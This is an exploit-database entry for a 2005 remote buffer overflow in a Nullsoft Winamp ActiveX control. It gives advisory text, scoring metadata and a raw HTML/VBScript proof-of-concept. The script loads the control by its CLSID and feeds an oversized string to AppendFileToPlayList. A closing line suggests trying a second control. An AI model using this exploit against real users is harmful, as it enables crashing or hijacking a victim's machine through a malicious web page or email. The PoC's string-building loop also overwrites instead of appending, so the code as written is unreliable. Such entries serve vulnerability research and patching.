header-logo
Suggest Exploit
vendor:
Winamp
by:
SecurityFocus
9.3
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: Winamp
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2005

Nullsoft Winamp ActiveX Control Remote Buffer Overflow Vulnerability

Nullsoft Winamp ActiveX Control is alleged to be prone to a remote buffer overflow vulnerability. This issue presents itself in an ActiveX control installed by the application. Reportedly, a malicious attacker can exploit this issue to execute arbitrary code. An attacker can exploit this issue by enticing a victim to view a malicious HTML document containing a malicious script that will overflow the buffer. This can be done by sending the malicious HTML document as an email attachment or by hosting it on a malicious website.

Mitigation:

Users should exercise caution when handling HTML documents from untrusted sources. It is also recommended that users disable ActiveX controls in their web browsers.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/11107/info

Nullsoft Winamp ActiveX Control is alleged to be prone to a remote buffer overflow vulnerability. This issue presents itself in an ActiveX control installed by the application. Reportedly, a malicious attacker can exploit this issue to execute arbitrary code.

<HTML>
<HEAD>
<META http-equiv=Content-Type content="text/html; charset=windows-1252">
<META content="MSHTML 6.00.2800.1400" name=GENERATOR></HEAD>
<BODY>
<OBJECT id=Kylie height=250 hspace=20 width=250 align=left classid=clsid:FA3662C3-
B8E8-11D6-A667-0010B556D978>
<PARAM NAME="Initialize" VALUE="">
</OBJECT>
<SCRIPT language=vbscript>

dim xint
dim haveIgotthebestbumorwhat
for xint = 1 to 5000
haveIgotthebestbumorwhat = foo & "K"
next
Kylie.AppendFileToPlayList haveIgotthebestbumorwhat

</SCRIPT>
</BODY></HTML>

If you're bored could also try -

CoAxTrack Class - {B9F3009B-976B-41C4-A992-229DCCF3367C}.